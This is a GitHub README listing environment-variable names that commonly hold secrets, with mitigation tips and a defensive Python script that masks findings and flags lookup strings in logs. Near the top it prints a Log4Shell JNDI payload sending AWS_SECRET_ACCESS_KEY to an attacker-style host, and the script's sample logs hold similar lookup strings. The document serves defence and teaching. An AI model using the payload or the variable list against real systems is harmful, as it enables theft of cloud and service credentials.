Awesome list of secrets in environment variables
📝 Description
A list of secrets, passwords, API keys and tokens that are commonly stored in system environment variables.
An environment variable is a variable whose value is set outside the program, typically through functionality built into the operating system or microservice.
Much developer documentation recommends storing secrets in environment variables, but is that the best way to keep them?
An attacker can read the values of system environment variables through exploits such as:
- CVE-2021-44228 JNDI log4j (JAVA) (Read more...)
  ${jndi:ldap://somesitehackerofhell.com/z?leak=${env:AWS_SECRET_ACCESS_KEY:-NO_EXISTS}}
  Gets AWS_SECRET_ACCESS_KEY, or returns NO_EXISTS if the variable is not set
- CVE-XXXX-XXXX Web browser attack (Writeup/POC coming soon to my Github - Follow me on Github and Twitter 😉)
- and much more...
Because of that, I created this list of secrets in environment variables to help secure software.
Some practices that avoid leaking secrets stored in environment variables are to:
- Block or alert on the WAF when a request references system environment variables
- Store the path to a config file in the environment variable instead of the plaintext value
- Encrypt the values stored in environment variables
- Use a different mechanism to store secrets
🤓
You can check your system environment variables:
- Windows, execute in PowerShell:
  dir env:
- Linux/MacOS, execute in a terminal:
  printenv
  or env
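An added example (not part of this repository) that ties the two points above together: it audits a process environment for names from this list, reporting values masked, and applies the WAF-style rule from the mitigation list to sample request lines. The variable subset, the suffix heuristic and the log lines are constructed here for illustration.

```python
import os
import re
from typing import Dict, Iterable, List

# Constructed subset of the variable names catalogued on this page.
KNOWN_SECRET_VARS = {
    "AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AZURE_CLIENT_SECRET",
    "GH_TOKEN", "GITHUB_TOKEN", "NPM_TOKEN", "SLACK_TOKEN", "STRIPE_API_KEY",
    "TWILIO_AUTH_TOKEN", "VAULT_TOKEN", "DOCKERHUB_PASSWORD", "CI_JOB_TOKEN",
}
# Name suffixes that mark a variable as a likely secret even if it is not in the list.
SECRET_SUFFIXES = ("_SECRET", "_TOKEN", "_PASSWORD", "_API_KEY")

def mask(value: str) -> str:
    """Keep only the last four characters so the report itself never leaks the secret."""
    if len(value) <= 4:
        return "*" * len(value)
    return "*" * (len(value) - 4) + value[-4:]

def audit_environment(environ: Dict[str, str]) -> Dict[str, str]:
    """Return {name: masked_value} for every variable that looks like a secret."""
    findings = {}
    for name, value in environ.items():
        upper = name.upper()
        if upper in KNOWN_SECRET_VARS or upper.endswith(SECRET_SUFFIXES):
            findings[name] = mask(value)
    return findings

# ${env:...} and ${jndi:...} lookups (the two forms shown above), raw or URL-encoded.
LOOKUP_RE = re.compile(r"(\$\{|%24%7B)\s*(env|jndi)\s*(:|%3A)", re.IGNORECASE)

def detect_env_lookup(request_line: str) -> bool:
    """WAF-style rule: does this request line carry a lookup expression?"""
    return LOOKUP_RE.search(request_line) is not None

def scan_request_log(lines: Iterable[str]) -> List[str]:
    """Return the request lines that should be blocked or alerted on."""
    return [line for line in lines if detect_env_lookup(line)]

if __name__ == "__main__":
    # Audit the real process environment; values are printed masked.
    for name, masked in sorted(audit_environment(dict(os.environ)).items()):
        print(f"{name}={masked}")
    sample_log = [  # constructed access-log request lines
        "GET /index.html HTTP/1.1",
        "GET /login?user=${jndi:ldap://attacker.invalid/a} HTTP/1.1",
        "GET /search?q=%24%7Benv%3AAWS_SECRET_ACCESS_KEY%7D HTTP/1.1",
    ]
    print("suspicious:", scan_request_log(sample_log))
```

The regex only covers the literal and URL-encoded forms; a real WAF rule should run after its own decoding stage so that other encodings of the same expression are normalised first.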
Awesome list of secrets in environment variables
A
AWS
- AWS_ACCESS_KEY_ID
- AWS_SECRET_ACCESS_KEY
- AMAZON_AWS_ACCESS_KEY_ID
- AMAZON_AWS_SECRET_ACCESS_KEY
source: https://docs.aws.amazon.com/sdkref/latest/guide/setting-global-aws_secret_access_key.html
Azure
- AZURE_CLIENT_ID
- AZURE_CLIENT_SECRET
- AZURE_USERNAME
- AZURE_PASSWORD
- MSI_ENDPOINT
- MSI_SECRET
source: https://docs.microsoft.com/en-us/dotnet/api/azure.identity.environmentcredential?view=azure-dotnet
source: https://techcommunity.microsoft.com/t5/azure-developer-community-blog/understanding-azure-msi-managed-service-identity-tokens-caching/ba-p/337406
B
Binance
- binance_api
- binance_secret
source: https://algotrading101.com/learn/binance-python-api-guide/
Bittrex
- BITTREX_API_KEY
- BITTREX_API_SECRET
source: https://github.com/TeamWertarbyte/crypto-trading-bot/blob/development/README.md
C
CircleCI
- CIRCLE_TOKEN
source: https://circleci.com/docs/2.0/api-developers-guide/
D
DigitalOcean
- DIGITALOCEAN_ACCESS_TOKEN
source: https://github.com/digitalocean/doctl#authenticating-with-digitalocean
Docker Hub
- DOCKERHUB_PASSWORD
source: https://circleci.com/docs/2.0/env-vars/
E
F
Fastlane products
- ITC_PASSWORD
source: https://github.com/phatblat/fastlane-variables
Facebook
- FACEBOOK_APP_ID
- FACEBOOK_APP_SECRET
- FACEBOOK_ACCESS_TOKEN
G
GitHub
- GH_TOKEN
- GITHUB_TOKEN
- GH_ENTERPRISE_TOKEN
- GITHUB_ENTERPRISE_TOKEN
source: https://cli.github.com/manual/gh_help_environment
Google Cloud
- GOOGLE_APPLICATION_CREDENTIALS
- GOOGLE_API_KEY
source: https://cloud.google.com/docs/authentication/getting-started#windows
GitLab
- CI_DEPLOY_USER
- CI_DEPLOY_PASSWORD
- GITLAB_USER_LOGIN
- CI_JOB_JWT
- CI_JOB_JWT_V2
- CI_JOB_TOKEN
source: https://docs.gitlab.com/ee/ci/variables/predefined_variables.html
H
I
J
K
L
M
Mailgun
- MAILGUN_API_KEY
source: https://www.pulumi.com/registry/packages/mailgun/installation-configuration/
MongoDB
- MCLI_PRIVATE_API_KEY
- MCLI_PUBLIC_API_KEY
source: https://docs.mongodb.com/mongocli/stable/configure/environment-variables/
N
NPM
- NPM_TOKEN
source: https://docs.npmjs.com/using-private-packages-in-a-ci-cd-workflow
O
OpenStack command-line client
- OS_PASSWORD
P
Percy.io
- PERCY_TOKEN
source: https://docs.percy.io/docs/environment-variables
Q
R
S
Sentry
- SENTRY_AUTH_TOKEN
source: https://docs.sentry.io/product/cli/configuration/
Slack
- SLACK_TOKEN
source: https://slack.dev/node-slack-sdk/getting-started
Square
- square_access_token
- square_oauth_secret
source: https://www.npmjs.com/package/square/v/12.0.0?activeTab=readme
Stripe
- STRIPE_API_KEY
- STRIPE_DEVICE_NAME
source: https://stripe.com/docs/cli/api_keys
T
Twilio
- TWILIO_ACCOUNT_SID
- TWILIO_AUTH_TOKEN
source: https://www.twilio.com/blog/2017/01/how-to-set-environment-variables.html
Twitter
- CONSUMER_KEY
- CONSUMER_SECRET
source: https://developer.twitter.com/en/docs/authentication/guides/authentication-best-practices
Travis CI
- TRAVIS_SUDO
- TRAVIS_OS_NAME
- TRAVIS_SECURE_ENV_VARS
source: https://docs.travis-ci.com/user/environment-variables
U
V
Vault HashiCorp
- VAULT_TOKEN
- VAULT_CLIENT_KEY
source: https://www.vaultproject.io/docs/commands
Vultr
- TOKEN
- VULTR_ACCESS
- VULTR_SECRET
source: https://www.vultr.com/docs/deploying-javascript-unikernels-to-vultr-with-ops
W
X
Y
Z
Get a raw list:
The repository includes the raw list, auto-generated from README.md by a GitHub Action.
😎 Contributing
If you would like to add more secrets, please read and follow our Contributing guide.
Thanks!
💻 Useful links
- Stackoverflow - Is it secure to store passwords as environment variables (rather than as plain text) in config files?
- Google - Best practices for securely using API keys
- An Introduction to Environment Variables and How to Use Them
- Why you shouldn't use ENV variables for secret data
- The Triumph and Tragedy of .env Files
🤝 Show your support
✔️ Disclaimer
This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author.